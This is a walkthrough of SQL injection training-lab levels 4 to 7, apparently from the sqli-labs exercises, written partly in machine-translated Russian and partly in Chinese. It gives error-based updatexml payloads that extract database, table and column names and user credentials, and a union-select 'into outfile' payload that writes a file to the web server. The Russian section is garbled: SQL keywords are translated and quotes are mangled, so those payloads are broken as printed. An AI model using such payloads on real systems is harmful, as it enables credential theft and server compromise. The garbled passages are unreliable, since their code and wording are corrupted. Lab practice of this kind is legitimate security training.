МЕНЬШЕ - 4
Сначала попробуйте одиночные кавычки, мы не нашли никакого эффекта, а не об ошибке, а затем в соответствии с названием в двойных кавычках, ошибка.
Содержание ошибки может быть найден, параметр идентификатор включен в двойные кавычки и скобки. И похоже на предыдущий вопрос, конструкция вводится запрос.
«) И updatexml (1, CONCAT (0x7e (выберите базу данных ()), 0x7e), 1) - +
Следующие шаги, как и раньше.
МЕНЬШЕ - 5
Знать имя базы данных после того, как безопасность, библиотека начала взрыва.
'И updatexml (1, CONCAT (0x7e, (выбрать имя_таблицы из INFORMATION_SCHEMA.TABLES, где table_schema =' безопасность»предел 0,1), 1) - +
Найти таблицу, в которой пользователи обычно является то, что нам нужно найти таблицу. А затем просмотреть таблицу имен полей.
'И updatexml (1, CONCAT (0x7e, (выбери имя_столбец из INFORMATION_SCHEMA.COLUMNS, где table_schema =' безопасности»и имя_таблицы = '' предел пользователей 0,1), 1) - +
Поля найдены имя пользователя идентификатор пароль .. Ну, у нас есть данные имя пользователя и пароль стал взрыв.
'И updatexml (1, CONCAT (0x7e (выберите имя пользователя из security.users ограничить 0,1), 1) - +
Первый пользователь, имя пользователя и пароль Тупые. Тогда задняя часть параметра предела немного изменилась, вы можете просмотреть информацию о других пользователях, ограничение 0,1 является первым данным, предел 1,1 является вторыми данными, предел ноты и подстрока не то же самое, предел равен нулю и зиЬзЬги составляют от 1 до начала.
МЕНЬШЕ - 6
和上一题不同的是这题是加双引号进行注入。其他都一样。
LESS--7
添加单引号,发现报错,猜测可能是字符型的注入。
首先添加单引号报错,再添加and 1=1 --+ 发现报错 认为不是单纯的单引号的类型,应该是还有其他的字符, 比如两个单引号,或者单引号括号, 或者单引号双引号, 单引号单引号括号之类的。
payload:?id=1')) union select 1,2,3 into outfile "C:\\wamp\\www\\sql\\Less-7\\test.txt"--+
测试是否写入:
发现确实存在,已经成功写入。